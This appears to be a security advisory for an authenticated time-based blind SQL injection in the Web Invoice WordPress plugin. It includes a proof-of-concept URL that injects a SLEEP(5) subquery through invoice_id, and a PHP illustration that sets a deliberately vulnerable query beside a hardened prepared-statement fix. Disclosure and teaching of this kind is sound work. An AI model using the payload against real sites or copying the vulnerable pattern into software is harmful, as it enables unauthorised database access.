Source: wpexploit | Author: Daniel Krohmer | WPEX-ID: 45F43359-98C2-4447-B51B-2D466BAD8261
Published: Dec 12, 2022 - 12:00 a.m.

Web Invoice <= 2.1.3 - Authenticated SQLi

Tags: web invoice, authenticated, sql injection, user, manage invoice, admin, plugin, settings, url, exploit

EPSS: 0.001 (percentile 50.4%)

The plugin does not properly sanitise and escape the invoice_id parameter before using it in a SQL statement, leading to a SQL Injection (time-based blind, as the proof of concept below shows) that is exploitable by high-privilege users such as admin by default. However, depending on the plugin configuration, lower-privileged users such as subscribers could exploit it as well, because the "Manage invoice" permission that gates the affected page can be granted to other roles.

When logged in as a user allowed to Manage invoice (admin by default, but this can be changed via the plugin's settings), open the following URL. On a vulnerable version the response is delayed by roughly 5 seconds because the injected SLEEP(5) is evaluated by the database:

https://example.com/wp-admin/admin.php?page=new_web_invoice&invoice_id=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web_invoice_action=clear_log
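The following is an added illustration and is not the Web Invoice plugin's code: a hypothetical WordPress admin-page handler that reproduces the pattern the advisory describes (a request parameter used as a bare number in a SQL statement) next to a hardened version. The function names, the wi_invoices table and the capability name used for the "Manage invoice" check are assumptions.

```php
<?php
// Hypothetical reconstruction of the vulnerable pattern (not the plugin's code).
// Assumed names: wi_render_invoice_*, table {prefix}wi_invoices, capability
// 'manage_web_invoice'. The advisory notes this capability is admin-only by
// default but can be granted to other roles in the plugin settings, so the
// capability check alone does not make the SQL safe.

// VULNERABLE: invoice_id is taken from the request and concatenated verbatim.
// A value such as
//   31618572 AND (SELECT 5926 FROM (SELECT(SLEEP(5)))erUA)
// lands in the WHERE clause unchanged, so the database evaluates the
// attacker's subquery and the response is delayed by ~5 s (time-based blind).
// Note that esc_sql() would not help here: the value is used as a bare number,
// not inside quotes, so escaping quote characters changes nothing.
function wi_render_invoice_vulnerable() {
    global $wpdb;
    if ( ! current_user_can( 'manage_web_invoice' ) ) {
        wp_die( 'Forbidden' );
    }
    $invoice_id = isset( $_GET['invoice_id'] ) ? $_GET['invoice_id'] : 0;
    return $wpdb->get_row(
        "SELECT * FROM {$wpdb->prefix}wi_invoices WHERE id = " . $invoice_id
    );
}

// HARDENED: enforce the integer type, then bind the value with $wpdb->prepare().
function wi_render_invoice_fixed() {
    global $wpdb;
    if ( ! current_user_can( 'manage_web_invoice' ) ) {
        wp_die( 'Forbidden' );
    }
    // absint() reduces "31618572 AND (SELECT ...)" to 31618572, so nothing
    // but digits can ever reach the query.
    $invoice_id = isset( $_GET['invoice_id'] ) ? absint( $_GET['invoice_id'] ) : 0;
    if ( 0 === $invoice_id ) {
        return null;
    }
    // The %d placeholder formats the value as an integer; it is never
    // interpreted as SQL, even if the type cast above were removed.
    return $wpdb->get_row(
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}wi_invoices WHERE id = %d",
            $invoice_id
        )
    );
}
```

The two changes are independent defences: the integer cast stops non-numeric input at the edge, and the prepared statement guarantees that whatever reaches the query is treated as data. Either alone would neutralise the proof-of-concept URL above; both together are the idiomatic WordPress fix.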
